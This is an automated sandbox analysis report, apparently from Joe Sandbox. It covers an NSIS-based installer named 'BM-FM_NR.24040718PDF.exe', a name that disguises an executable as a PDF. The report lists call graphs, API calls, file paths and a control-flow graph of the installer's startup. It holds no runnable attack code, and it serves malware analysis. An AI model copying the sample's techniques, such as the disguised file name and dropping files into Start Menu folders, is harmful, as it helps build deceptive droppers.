4170->4095 4172 405f9a 5 API calls 4171->4172 4173 4030ea 4172->4173 4174 4030f4 4173->4174 4175 4057a1 3 API calls 4173->4175 4174->4102 4176 4030fc 4175->4176 4177 40548b 2 API calls 4176->4177 4178 403102 4177->4178 4295 4059d1 4178->4295 4299 4059a2 GetFileAttributesA CreateFileA 4181->4299 4183 402ca6 4204 402cb6 4183->4204 4300 405d2f lstrcpynA 4183->4300 4185 402ccc 4186 4057e8 2 API calls 4185->4186 4187 402cd2 4186->4187 4301 405d2f lstrcpynA 4187->4301 4189 402cdd GetFileSize 4190 402cf4 4189->4190 4191 402dd9 4189->4191 4190->4191 4194 4030b1 ReadFile 4190->4194 4196 402e45 4190->4196 4190->4204 4205 402c02 6 API calls 4190->4205 4302 402c02 4191->4302 4193 402de2 4195 402e12 GlobalAlloc 4193->4195 4193->4204 4314 4030c7 SetFilePointer 4193->4314 4194->4190 4313 4030c7 SetFilePointer 4195->4313 4200 402c02 6 API calls 4196->4200 4199 402e2d 4203 402e9f 32 API calls 4199->4203 4200->4204 4201 402dfb 4202 4030b1 ReadFile 4201->4202 4206 402e06 4202->4206 4207 402e39 4203->4207 4204->4111 4205->4190 4206->4195 4206->4204 4207->4204 4208 402e76 SetFilePointer 4207->4208 4208->4204 4210 4060c8 5 API calls 4209->4210 4211 4036c3 4210->4211 4212 4036c9 4211->4212 4213 4036db 4211->4213 4328 405c8d wsprintfA 4212->4328 4214 405c16 3 API calls 4213->4214 4215 403706 4214->4215 4216 403724 lstrcatA 4215->4216 4218 405c16 3 API calls 4215->4218 4219 4036d9 4216->4219 4218->4216 4319 403974 4219->4319 4222 40588f 18 API calls 4223 403756 4222->4223 4224 4037df 4223->4224 4226 405c16 3 API calls 4223->4226 4225 40588f 18 API calls 4224->4225 4227 4037e5 4225->4227 4228 403782 4226->4228 4229 4037f5 LoadImageA 4227->4229 4232 405d51 18 API calls 4227->4232 4228->4224 4235 40379e lstrlenA 4228->4235 4238 4057cc CharNextA 4228->4238 4230 40389b 4229->4230 4231 40381c RegisterClassA 4229->4231 4234 40140b 2 API calls 4230->4234 4233 403852 SystemParametersInfoA CreateWindowExA 4231->4233 4264 4038a5 4231->4264 4232->4229 4233->4230 4240 4038a1 4234->4240 4236 4037d2 4235->4236 4237 4037ac lstrcmpiA 4235->4237 4241 4057a1 3 API calls 4236->4241 4237->4236 4239 4037bc GetFileAttributesA 4237->4239 4242 40379c 4238->4242 4243 4037c8 4239->4243 4244 403974 19 API calls 4240->4244 4240->4264 4245 4037d8 4241->4245 4242->4235 4243->4236 4246 4057e8 2 API calls 4243->4246 4247 4038b2 4244->4247 4329 405d2f lstrcpynA 4245->4329 4246->4236 4249 403941 4247->4249 4250 4038be ShowWindow 4247->4250 4251 40501a 5 API calls 4249->4251 4252 40605a 3 API calls 4250->4252 4253 403947 4251->4253 4254 4038d6 4252->4254 4255 403963 4253->4255 4256 40394b 4253->4256 4257 4038e4 GetClassInfoA 4254->4257 4259 40605a 3 API calls 4254->4259 4258 40140b 2 API calls 4255->4258 4263 40140b 2 API calls 4256->4263 4256->4264 4260 4038f8 GetClassInfoA RegisterClassA 4257->4260 4261 40390e DialogBoxParamA 4257->4261 4258->4264 4259->4257 4260->4261 4262 40140b 2 API calls 4261->4262 4262->4264 4263->4264 4264->4165 4265->4100 4266->4146 4267->4116 4269 4035ed 4268->4269 4270 4035df CloseHandle 4268->4270 4331 40361a 4269->4331 4270->4269 4273 4055d1 69 API calls 4274 40340c OleUninitialize 4273->4274 4274->4122 4274->4123 4277 40553a 4275->4277 4276 40342b ExitProcess 4277->4276 4278 40554e MessageBoxIndirectA 4277->4278 4278->4276 4280 4060c8 5 API calls 4279->4280 4281 403438 lstrcatA 4280->4281 4281->4139 4281->4140 4283 40347a 4282->4283 4284 40545f GetLastError 4282->4284 4283->4152 4284->4283 4285 40546e SetFileSecurityA 4284->4285 4285->4283 4286 405484 GetLastError 4285->4286 4286->4283 4288 40549b 4287->4288 4289 40549f GetLastError 4287->4289 4288->4152 4289->4288 4290->4155 4291->4158 4293 4054f3 CloseHandle 4292->4293 4294 4054ff 4292->4294 4293->4294 4294->4158 4296 4059dc GetTickCount GetTempFileNameA 4295->4296 4297 40310d 4296->4297 4298 405a09 4296->4298 4297->4102 4298->4296 4298->4297 4299->4183 4300->4185 4301->4189 4303 402c23 4302->4303 4304 402c0b 4302->4304 4307 402c33 GetTickCount 4303->4307 4308 402c2b 4303->4308 4305 402c14 DestroyWindow 4304->4305 4306 402c1b 4304->4306 4305->4306 4306->4193 4309 402c41 CreateDialogParamA ShowWindow 4307->4309 4310 402c64 4307->4310 4315 406104 4308->4315 4309->4310 4310->4193 4313->4199 4314->4201 4316 406121 PeekMessageA 4315->4316 4317 402c31 4316->4317 4318 406117 DispatchMessageA 4316->4318 4317->4193 4318->4316 4320 403988 4319->4320 4330 405c8d wsprintfA 4320->4330 4322 4039f9 4323 405d51 18 API calls 4322->4323 4324 403a05 SetWindowTextA 4323->4324 4325 403734 4324->4325 4326 403a21 4324->4326 4325->4222 4326->4325 4327 405d51 18 API calls 4326->4327 4327->4326 4328->4219 4329->4224 4330->4322 4332 403628 4331->4332 4333 4035f2 4332->4333 4334 40362d FreeLibrary GlobalFree 4332->4334 4333->4273 4334->4333 4334->4334 4335 402410 4336 402b44 19 API calls 4335->4336 4337 40241a 4336->4337 4338 402a3a 18 API calls 4337->4338 4339 402423 4338->4339 4340 40242d RegQueryValueExA 4339->4340 4342 4026a6 4339->4342 4341 40244d 4340->4341 4345 402453 RegCloseKey 4340->4345 4341->4345 4346 405c8d wsprintfA 4341->4346 4345->4342 4346->4345 4347 401f90 4348 401fa2 4347->4348 4349 402050 4347->4349 4350 402a3a 18 API calls 4348->4350 4351 401423 25 API calls 4349->4351 4352 401fa9 4350->4352 4358 4021c9 4351->4358 4353 402a3a 18 API calls 4352->4353 4354 401fb2 4353->4354 4355 401fc7 LoadLibraryExA 4354->4355 4356 401fba GetModuleHandleA 4354->4356 4355->4349 4357 401fd7 GetProcAddress 4355->4357 4356->4355 4356->4357 4359 402023 4357->4359 4360 401fe6 4357->4360 4363 404f48 25 API calls 4359->4363 4361 402005 4360->4361 4362 401fee 4360->4362 4368 100016bd 4361->4368 4410 401423 4362->4410 4365 401ff6 4363->4365 4365->4358 4366 402044 FreeLibrary 4365->4366 4366->4358 4369 100016ed 4368->4369 4413 10001a5d 4369->4413 4371 100016f4 4372 1000180a 4371->4372 4373 10001705 4371->4373 4374 1000170c 4371->4374 4372->4365 4462 100021b0 4373->4462 4445 100021fa 4374->4445 4379 10001770 4385 100017b2 4379->4385 4386 10001776 4379->4386 4380 10001752 4475 100023da 4380->4475 4381 10001722 4384 10001728 4381->4384 4390 10001733 4381->4390 4382 1000173b 4395 10001731 4382->4395 4472 10002aa3 4382->4472 4384->4395 4456 100027e8 4384->4456 4388 100023da 11 API calls 4385->4388 4392 10001559 3 API calls 4386->4392 4393 100017a4 4388->4393 4389 10001758 4486 10001559 4389->4486 4466 10002589 4390->4466 4397 1000178c 4392->4397 4401 100017f9 4393->4401 4497 100023a0 4393->4497 4395->4379 4395->4380 4400 100023da 11 API calls 4397->4400 4399 10001739 4399->4395 4400->4393 4401->4372 4403 10001803 GlobalFree 4401->4403 4403->4372 4407 100017e5 4407->4401 4501 100014e2 wsprintfA 4407->4501 4408 100017de FreeLibrary 4408->4407 4411 404f48 25 API calls 4410->4411 4412 401431 4411->4412 4412->4365 4504 10001215 GlobalAlloc 4413->4504 4415 10001a81 4505 10001215 GlobalAlloc 4415->4505 4417 10001cbb GlobalFree GlobalFree GlobalFree 4418 10001cd8 4417->4418 4437 10001d22 4417->4437 4419 1000201a 4418->4419 4427 10001ced 4418->4427 4418->4437 4421 1000203c GetModuleHandleA 4419->4421 4419->4437 4420 10001b60 GlobalAlloc 4442 10001a8c 4420->4442 4422 10002062 4421->4422 4423 1000204d LoadLibraryA 4421->4423 4512 100015a4 GetProcAddress 4422->4512 4423->4422 4423->4437 4424 10001bab lstrcpyA 4428 10001bb5 lstrcpyA 4424->4428 4425 10001bc9 GlobalFree 4425->4442 4427->4437 4508 10001224 4427->4508 4428->4442 4429 100020b3 4431 100020c0 lstrlenA 4429->4431 4429->4437 4430 10001f7a 4436 10001fbe lstrcpyA 4430->4436 4430->4437 4513 100015a4 GetProcAddress 4431->4513 4433 10002074 4433->4429 4444 1000209d GetProcAddress 4433->4444 4436->4437 4437->4371 4438 10001c07 4438->4442 4506 10001534 GlobalSize GlobalAlloc 4438->4506 4439 10001e75 GlobalFree 4439->4442 4440 100020d9 4440->4437 4442->4417 4442->4420 4442->4424 4442->4425 4442->4428 4442->4430 4442->4437 4442->4438 4442->4439 4443 10001224 2 API calls 4442->4443 4511 10001215 GlobalAlloc 4442->4511 4443->4442 4444->4429 4446 10002212 4445->4446 4448 10002349 GlobalFree 4446->4448 4449 100022b9 GlobalAlloc MultiByteToWideChar 4446->4449 4450 1000230a lstrlenA 4446->4450 4452 10001224 GlobalAlloc lstrcpynA 4446->4452 4515 100012ad 4446->4515 4448->4446 4451 10001712 4448->4451 4453 10002303 4449->4453 4454 100022e3 GlobalAlloc CLSIDFromString GlobalFree 4449->4454 4450->4448 4450->4453 4451->4381 4451->4382 4451->4395 4452->4446 4453->4448 4519 1000251d 4453->4519 4454->4448 4458 100027fa 4456->4458 4457 1000289f EnumWindows 4459 100028bd 4457->4459 4458->4457 4460 100029b9 4459->4460 4461 100029ae GetLastError 4459->4461 4460->4395 4461->4460 4463 100021c0 4462->4463 4464 1000170b 4462->4464 4463->4464 4465 100021d2 GlobalAlloc 4463->4465 4464->4374 4465->4463 4470 100025a5 4466->4470 4467 100025f6 GlobalAlloc 4471 10002618 4467->4471 4468 10002609 4469 1000260e GlobalSize 4468->4469 4468->4471 4469->4471 4470->4467 4470->4468 4471->4399 4474 10002aae 4472->4474 4473 10002aee GlobalFree 4474->4473 4522 10001215 GlobalAlloc 4475->4522 4477 1000243a lstrcpynA 4483 100023e6 4477->4483 4478 1000244b StringFromGUID2 WideCharToMultiByte 4478->4483 4479 1000246f WideCharToMultiByte 4479->4483 4480 10002490 wsprintfA 4480->4483 4481 100024b4 GlobalFree 4481->4483 4482 100024ee GlobalFree 4482->4389 4483->4477 4483->4478 4483->4479 4483->4480 4483->4481 4483->4482 4484 10001266 2 API calls 4483->4484 4523 100012d1 4483->4523 4484->4483 4527 10001215 GlobalAlloc 4486->4527 4488 1000155f 4489 1000156c lstrcpyA 4488->4489 4491 10001586 4488->4491 4492 100015a0 4489->4492 4491->4492 4493 1000158b wsprintfA 4491->4493 4494 10001266 4492->4494 4493->4492 4495 100012a8 GlobalFree 4494->4495 4496 1000126f GlobalAlloc lstrcpynA 4494->4496 4495->4393 4496->4495 4498 100017c5 4497->4498 4499 100023ae 4497->4499 4498->4407 4498->4408 4499->4498 4500 100023c7 GlobalFree 4499->4500 4500->4499 4502 10001266 2 API calls 4501->4502 4503 10001503 4502->4503 4503->4401 4504->4415 4505->4442 4507 10001552 4506->4507 4507->4438 4514 10001215 GlobalAlloc 4508->4514 4510 10001233 lstrcpynA 4510->4437 4511->4442 4512->4433 4513->4440 4514->4510 4516 100012b4 4515->4516 4517 10001224 2 API calls 4516->4517 4518 100012cf 4517->4518 4518->4446 4520 10002581 4519->4520 4521 1000252b VirtualAlloc 4519->4521 4520->4453 4521->4520 4522->4483 4524 100012f9 4523->4524 4525 100012da 4523->4525 4524->4483 4525->4524 4526 100012e0 lstrcpyA 4525->4526 4526->4524 4527->4488 5167 401490 5168 404f48 25 API calls 5167->5168 5169 401497 5168->5169 4590 401595 4591 402a3a 18 API calls 4590->4591 4592 40159c SetFileAttributesA 4591->4592 4593 4015ae 4592->4593 4599 402616 4600 40261d 4599->4600 4601 40287c 4599->4601 4602 402a1d 18 API calls 4600->4602 4603 402628 4602->4603 4604 40262f SetFilePointer 4603->4604 4604->4601 4605 40263f 4604->4605 4607 405c8d wsprintfA 4605->4607 4607->4601 4608 401717 4609 402a3a 18 API calls 4608->4609 4610 40171e SearchPathA 4609->4610 4611 401739 4610->4611 5170 10001058 5172 10001074 5170->5172 5171 100010dc 5172->5171 5173 100014bb GlobalFree 5172->5173 5174 10001091 5172->5174 5173->5174 5175 100014bb GlobalFree 5174->5175 5176 100010a1 5175->5176 5177 100010b1 5176->5177 5178 100010a8 GlobalSize 5176->5178 5179 100010b5 GlobalAlloc 5177->5179 5180 100010c6 5177->5180 5178->5177 5181 100014e2 3 API calls 5179->5181 5182 100010d1 GlobalFree 5180->5182 5181->5180 5182->5171 5183 402519 5184 40252e 5183->5184 5185 40251e 5183->5185 5187 402a3a 18 API calls 5184->5187 5186 402a1d 18 API calls 5185->5186 5188 402527 5186->5188 5189 402535 lstrlenA 5187->5189 5190 405a49 WriteFile 5188->5190 5191 402557 5188->5191 5189->5188 5190->5191 5192 40149d 5193 4014ab PostQuitMessage 5192->5193 5194 40226e 5192->5194 5193->5194 5195 100010e0 5204 1000110e 5195->5204 5196 100011c4 GlobalFree 5197 100012ad 2 API calls 5197->5204 5198 100011c3 5198->5196 5199 10001266 2 API calls 5202 100011b1 GlobalFree 5199->5202 5200 10001155 GlobalAlloc 5200->5204 5201 100011ea GlobalFree 5201->5204 5202->5204 5203 100012d1 lstrcpyA 5203->5204 5204->5196 5204->5197 5204->5198 5204->5199 5204->5200 5204->5201 5204->5202 5204->5203 5205 10002162 5206 100021c0 5205->5206 5207 100021f6 5205->5207 5206->5207 5208 100021d2 GlobalAlloc 5206->5208 5208->5206 5209 4046a3 5210 4046b3 5209->5210 5211 4046cf 5209->5211 5220 405509 GetDlgItemTextA 5210->5220 5213 404702 5211->5213 5214 4046d5 SHGetPathFromIDListA 5211->5214 5216 4046e5 5214->5216 5219 4046ec SendMessageA 5214->5219 5215 4046c0 SendMessageA 5215->5211 5218 40140b 2 API calls 5216->5218 5218->5219 5219->5213 5220->5215 5221 401ca7 5222 402a1d 18 API calls 5221->5222 5223 401cae 5222->5223 5224 402a1d 18 API calls 5223->5224 5225 401cb6 GetDlgItem 5224->5225 5226 402513 5225->5226 5227 404028 lstrcpynA lstrlenA 3950 40192a 3951 40192c 3950->3951 3952 402a3a 18 API calls 3951->3952 3953 401931 3952->3953 3956 4055d1 3953->3956 3996 40588f 3956->3996 3959 405610 3962 405748 3959->3962 4010 405d2f lstrcpynA 3959->4010 3960 4055f9 DeleteFileA 3961 40193a 3960->3961 3962->3961 4028 406033 FindFirstFileA 3962->4028 3964 405636 3965 405649 3964->3965 3966 40563c lstrcatA 3964->3966 4011 4057e8 lstrlenA 3965->4011 3968 40564f 3966->3968 3971 40565d lstrcatA 3968->3971 3973 405668 lstrlenA FindFirstFileA 3968->3973 3971->3973 3972 405766 4031 4057a1 lstrlenA CharPrevA 3972->4031 3975 40573e 3973->3975 3994 40568c 3973->3994 3975->3962 3977 4057cc CharNextA 3977->3994 3978 405589 5 API calls 3979 405778 3978->3979 3980 405792 3979->3980 3981 40577c 3979->3981 3984 404f48 25 API calls 3980->3984 3981->3961 3986 404f48 25 API calls 3981->3986 3982 40571d FindNextFileA 3985 405735 FindClose 3982->3985 3982->3994 3984->3961 3985->3975 3987 405789 3986->3987 3988 405bea 38 API calls 3987->3988 3991 405790 3988->3991 3990 4055d1 62 API calls 3990->3994 3991->3961 3992 404f48 25 API calls 3992->3982 3993 404f48 25 API calls 3993->3994 3994->3977 3994->3982 3994->3990 3994->3992 3994->3993 4015 405d2f lstrcpynA 3994->4015 4016 405589 3994->4016 4024 405bea MoveFileExA 3994->4024 4034 405d2f lstrcpynA 3996->4034 3998 4058a0 4035 40583a CharNextA CharNextA 3998->4035 4001 4055f1 4001->3959 4001->3960 4002 405f9a 5 API calls 4005 4058b6 4002->4005 4003 4058e1 lstrlenA 4004 4058ec 4003->4004 4003->4005 4007 4057a1 3 API calls 4004->4007 4005->4001 4005->4003 4006 406033 2 API calls 4005->4006 4009 4057e8 2 API calls 4005->4009 4006->4005 4008 4058f1 GetFileAttributesA 4007->4008 4008->4001 4009->4003 4010->3964 4012 4057f5 4011->4012 4013 405806 4012->4013 4014 4057fa CharPrevA 4012->4014 4013->3968 4014->4012 4014->4013 4015->3994 4041 40597d GetFileAttributesA 4016->4041 4019 4055b6 4019->3994 4020 4055a4 RemoveDirectoryA 4022 4055b2 4020->4022 4021 4055ac DeleteFileA 4021->4022 4022->4019 4023 4055c2 SetFileAttributesA 4022->4023 4023->4019 4025 405c0b 4024->4025 4026 405bfe 4024->4026 4025->3994 4044 405a78 lstrcpyA 4026->4044 4029 405762 4028->4029 4030 406049 FindClose 4028->4030 4029->3961 4029->3972 4030->4029 4032 40576c 4031->4032 4033 4057bb lstrcatA 4031->4033 4032->3978 4033->4032 4034->3998 4036 405865 4035->4036 4037 405855 4035->4037 4038 405885 4036->4038 4040 4057cc CharNextA 4036->4040 4037->4036 4039 405860 CharNextA 4037->4039 4038->4001 4038->4002 4039->4038 4040->4036 4042 405595 4041->4042 4043 40598f SetFileAttributesA 4041->4043 4042->4019 4042->4020 4042->4021 4043->4042 4045 405aa0 4044->4045 4046 405ac6 GetShortPathNameA 4044->4046 4071 4059a2 GetFileAttributesA CreateFileA 4045->4071 4047 405be5 4046->4047 4048 405adb 4046->4048 4047->4025 4048->4047 4051 405ae3 wsprintfA 4048->4051 4050 405aaa CloseHandle GetShortPathNameA 4050->4047 4052 405abe 4050->4052 4053 405d51 18 API calls 4051->4053 4052->4046 4052->4047 4054 405b0b 4053->4054 4072 4059a2 GetFileAttributesA CreateFileA 4054->4072 4056 405b18 4056->4047 4057 405b27 GetFileSize GlobalAlloc 4056->4057 4058 405b49 4057->4058 4059 405bde CloseHandle 4057->4059 4060 405a1a ReadFile 4058->4060 4059->4047 4061 405b51 4060->4061 4061->4059 4073 405907 lstrlenA 4061->4073 4064 405b68 lstrcpyA 4068 405b8a 4064->4068 4065 405b7c 4066 405907 4 API calls 4065->4066 4066->4068 4067 405bc1 SetFilePointer 4069 405a49 WriteFile 4067->4069 4068->4067 4070 405bd7 GlobalFree 4069->4070 4070->4059 4071->4050 4072->4056 4074 405948 lstrlenA 4073->4074 4075 405950 4074->4075 4076 405921 lstrcmpiA 4074->4076 4075->4064 4075->4065 4076->4075 4077 40593f CharNextA 4076->4077 4077->4074 5228 4028aa SendMessageA 5229 4028c4 InvalidateRect 5228->5229 5230 4028cf 5228->5230 5229->5230 4570 4015b3 4571 402a3a 18 API calls 4570->4571 4572 4015ba 4571->4572 4573 40583a 4 API calls 4572->4573 4585 4015c2 4573->4585 4574 40161c 4576 401621 4574->4576 4577 40164a 4574->4577 4575 4057cc CharNextA 4575->4585 4578 401423 25 API calls 4576->4578 4579 401423 25 API calls 4577->4579 4580 401628 4578->4580 4587 401642 4579->4587 4589 405d2f lstrcpynA 4580->4589 4582 40548b 2 API calls 4582->4585 4583 4054a8 5 API calls 4583->4585 4584 401633 SetCurrentDirectoryA 4584->4587 4585->4574 4585->4575 4585->4582 4585->4583 4586 401604 GetFileAttributesA 4585->4586 4588 40540e 4 API calls 4585->4588 4586->4585 4588->4585 4589->4584 5231 4016b3 5232 402a3a 18 API calls 5231->5232 5233 4016b9 GetFullPathNameA 5232->5233 5234 4016f1 5233->5234 5235 4016d0 5233->5235 5236 401705 GetShortPathNameA 5234->5236 5237 4028cf 5234->5237 5235->5234 5238 406033 2 API calls 5235->5238 5236->5237 5239 4016e1 5238->5239 5239->5234 5241 405d2f lstrcpynA 5239->5241 5241->5234 5242 4014b7 5243 4014bd 5242->5243 5244 401389 2 API calls 5243->5244 5245 4014c5 5244->5245 5246 401d38 GetDC GetDeviceCaps 5247 402a1d 18 API calls 5246->5247 5248 401d56 MulDiv ReleaseDC 5247->5248 5249 402a1d 18 API calls 5248->5249 5250 401d75 5249->5250 5251 405d51 18 API calls 5250->5251 5252 401dae CreateFontIndirectA 5251->5252 5253 402513 5252->5253 5254 404ebc 5255 404ee0 5254->5255 5256 404ecc 5254->5256 5258 404ee8 IsWindowVisible 5255->5258 5262 404eff 5255->5262 5257 404ed2 5256->5257 5266 404f29 5256->5266 5260 403f60 SendMessageA 5257->5260 5261 404ef5 5258->5261 5258->5266 5259 404f2e CallWindowProcA 5263 404edc 5259->5263 5260->5263 5264 404813 5 API calls 5261->5264 5262->5259 5265 404893 4 API calls 5262->5265 5264->5262 5265->5266 5266->5259 4622 40173e 4623 402a3a 18 API calls 4622->4623 4624 401745 4623->4624 4625 4059d1 2 API calls 4624->4625 4626 40174c 4625->4626 4627 4059d1 2 API calls 4626->4627 4627->4626 5267 401ebe 5268 402a3a 18 API calls 5267->5268 5269 401ec5 5268->5269 5270 406033 2 API calls 5269->5270 5271 401ecb 5270->5271 5273 401edd 5271->5273 5274 405c8d wsprintfA 5271->5274 5274->5273 5275 40193f 5276 402a3a 18 API calls 5275->5276 5277 401946 lstrlenA 5276->5277 5278 402513 5277->5278

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 40310f-403144 SetErrorMode GetVersion 1 403146-40314e call 4060c8 0->1 2 403157 0->2 1->2 7 403150 1->7 4 40315c-40316f call 40605a lstrlenA 2->4 9 403171-4031e4 call 4060c8 * 2 #17 OleInitialize SHGetFileInfoA call 405d2f GetCommandLineA call 405d2f GetModuleHandleA 4->9 7->2 18 4031f0-403205 call 4057cc CharNextA 9->18 19 4031e6-4031eb 9->19 22 4032ca-4032ce 18->22 19->18 23 4032d4 22->23 24 40320a-40320d 22->24 25 4032e7-403301 GetTempPathA call 4030de 23->25 26 403215-40321d 24->26 27 40320f-403213 24->27 36 403303-403321 GetWindowsDirectoryA lstrcatA call 4030de 25->36 37 403359-403373 DeleteFileA call 402c66 25->37 29 403225-403228 26->29 30 40321f-403220 26->30 27->26 27->27 31 4032ba-4032c7 call 4057cc 29->31 32 40322e-403232 29->32 30->29 31->22 51 4032c9 31->51 34 403234-40323a 32->34 35 40324a-403277 32->35 39 403240 34->39 40 40323c-40323e 34->40 41 403279-40327f 35->41 42 40328a-4032b8 35->42 36->37 53 403323-403353 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030de 36->53 54 403407-403417 call 4035d5 OleUninitialize 37->54 55 403379-40337f 37->55 39->35 40->35 40->39 46 403281-403283 41->46 47 403285 41->47 42->31 49 4032d6-4032e2 call 405d2f 42->49 46->42 46->47 47->42 49->25 51->22 53->37 53->54 66 40353b-403541 54->66 67 40341d-40342d call 405525 ExitProcess 54->67 58 403381-40338c call 4057cc 55->58 59 4033f7-4033fe call 4036af 55->59 68 4033c2-4033cc 58->68 69 40338e-4033b7 58->69 64 403403 59->64 64->54 71 403543-40355c GetCurrentProcess OpenProcessToken 66->71 72 4035bd-4035c5 66->72 76 403433-403447 call 4054a8 lstrcatA 68->76 77 4033ce-4033db call 40588f 68->77 73 4033b9-4033bb 69->73 79 40358e-40359c call 4060c8 71->79 80 40355e-403588 LookupPrivilegeValueA AdjustTokenPrivileges 71->80 74 4035c7 72->74 75 4035cb-4035cf ExitProcess 72->75 73->68 81 4033bd-4033c0 73->81 74->75 89 403454-40346e lstrcatA lstrcmpiA 76->89 90 403449-40344f lstrcatA 76->90 77->54 88 4033dd-4033f3 call 405d2f * 2 77->88 91 4035aa-4035b4 ExitWindowsEx 79->91 92 40359e-4035a8 79->92 80->79 81->68 81->73 88->59 89->54 95 403470-403473 89->95 90->89 91->72 93 4035b6-4035b8 call 40140b 91->93 92->91 92->93 93->72 99 403475-40347a call 40540e 95->99 100 40347c call 40548b 95->100 104 403481-40348e SetCurrentDirectoryA 99->104 100->104 107 403490-403496 call 405d2f 104->107 108 40349b-4034c3 call 405d2f 104->108 107->108 112 4034c9-4034e5 call 405d51 DeleteFileA 108->112 115 403526-40352d 112->115 116 4034e7-4034f7 CopyFileA 112->116 115->112 117 40352f-403536 call 405bea 115->117 116->115 118 4034f9-403519 call 405bea call 405d51 call 4054c0 116->118 117->54 118->115 127 40351b-403522 CloseHandle 118->127 127->115
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE ref: 00403134
                                                                      • GetVersion.KERNEL32 ref: 0040313A
                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403163
                                                                      • #17.COMCTL32(00000007,00000009), ref: 00403185
                                                                      • OleInitialize.OLE32(00000000), ref: 0040318C
                                                                      • SHGetFileInfoA.SHELL32(00428828,00000000,?,00000160,00000000), ref: 004031A8
                                                                      • GetCommandLineA.KERNEL32(Dominique Setup,NSIS Error), ref: 004031BD
                                                                      • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe",00000000), ref: 004031D0
                                                                      • CharNextA.USER32(00000000,"C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe",00000020), ref: 004031FB
                                                                      • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032F8
                                                                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403309
                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403315
                                                                      • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403329
                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403331
                                                                      • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403342
                                                                      • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040334A
                                                                      • DeleteFileA.KERNELBASE(1033), ref: 0040335E
                                                                        • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                        • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                      • OleUninitialize.OLE32(?), ref: 0040340C
                                                                      • ExitProcess.KERNEL32 ref: 0040342D
                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040354A
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403551
                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403569
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403588
                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004035AC
                                                                      • ExitProcess.KERNEL32 ref: 004035CF
                                                                        • Part of subcall function 00405525: MessageBoxIndirectA.USER32(00409218), ref: 00405580
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                      • String ID: "$"C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold$C:\Users\user\Desktop$C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe$Dominique Setup$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`K*v$~nsu
                                                                      • API String ID: 3329125770-1715251254
                                                                      • Opcode ID: 8cf9f27780d4a9ffc016deafba261a7cdcbd07a9ed72e1522d1863b0730728e5
                                                                      • Instruction ID: 749ed98c63e487a66f460374afa67f5348490bcf6ac540fe4d7c6930d14d49f5
                                                                      • Opcode Fuzzy Hash: 8cf9f27780d4a9ffc016deafba261a7cdcbd07a9ed72e1522d1863b0730728e5
                                                                      • Instruction Fuzzy Hash: E1C105306086416AE7216F61AC4DA6F3EACEF46706F04457FF541BA1E3C77C9A058B2E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
